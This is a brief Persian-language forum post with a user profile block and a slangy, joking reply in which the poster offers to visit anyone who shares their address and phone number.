    black_jack_of_black_city Registered User

    تاریخ عضویت:
    ‏19 سپتامبر 2003
    نوشته ها:
    1,449
    تشکر شده:
    48
    محل سکونت:
    با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
    اي بابا اين چه حرفيه داش محسن

    اصن از همين تريبون من اعلام ميكنم كه هر كي آدرس و شماره تلفنشو بهم بده راس ميرم خونشون و اگه دوس داش شب رو باهم ميگذرونيم